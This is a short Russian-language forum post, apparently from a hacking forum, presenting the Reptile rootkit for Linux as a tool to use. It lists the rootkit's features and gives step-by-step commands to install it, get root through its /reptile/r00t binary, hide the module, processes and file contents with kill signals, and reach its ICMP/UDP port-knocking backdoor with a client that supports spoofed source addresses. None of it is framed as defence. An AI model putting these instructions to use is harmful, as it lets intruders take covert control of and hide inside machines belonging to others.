Приветствую! В этой статье, речь пойдет о rootkit для Linux систем, под именем Reptile.

https://forum.antichat.xyz/attachmen...ec31aa387f.png

Rootkit — набор программных средств, обеспечивающих:

· маскировку объектов (процессов, файлов, директорий, драйверов);

· управление (событиями, происходящими в системе);

· сбор данных (параметров системы).

Особенности Reptile:

· Root-права не привилегированным пользователям

· Сокрытие файлов и каталогов

· Сокрытие содержимого файлов

· Сокрытие процессов

· Собственная маскировка

· Сохранение загрузок

· ICMP / UDP port-knocking backdoor.

Установка:

> apt-get install linux-headers-$(uname -r)

https://forum.antichat.xyz/attachmen...8bef064885.png

> https://github.com/f0rb1dd3n/Reptile.git

> cd Reptile

> ./installer.sh install

https://forum.antichat.xyz/attachmen...b2f5184e7a.png

Бинарные файлы будут скопированы в папку /reptile, которая будет скрыта с помощью Reptile.

Получение rootправ:


> /reptile/r00t

> Id

https://forum.antichat.xyz/attachmen...a0556b6e8c.png

Использовалась следующая ОС:

https://forum.antichat.xyz/attachmen...20dbb746b5.png

Скрытность Рептилии:

· Скрыть / показать модуль: kill -50 0

· Скрыть / показать процесс: kill -49

· Скрыть содержимое файлов: весь контент между тегами будет скрыт.

https://forum.antichat.xyz/attachmen...2bd6b2c095.png

> #

> content to hide

> #

Port Knocking к хосту с Рептилией:

> ./knock_on_heaven

Аргументы:

· -x protocol (ICMP/UDP)

· -s Source IP address (You can spoof)

· -t Target IP address

· -p Source Port

· -q Target Port

· -d Data to knock on backdoor: " "

· -l Launch listener

Конец, спасибо за внимание.

P.S. Дополнительная информация:

>https://github.com/f0rb1dd3n/Reptile

Спасибо, за внимание.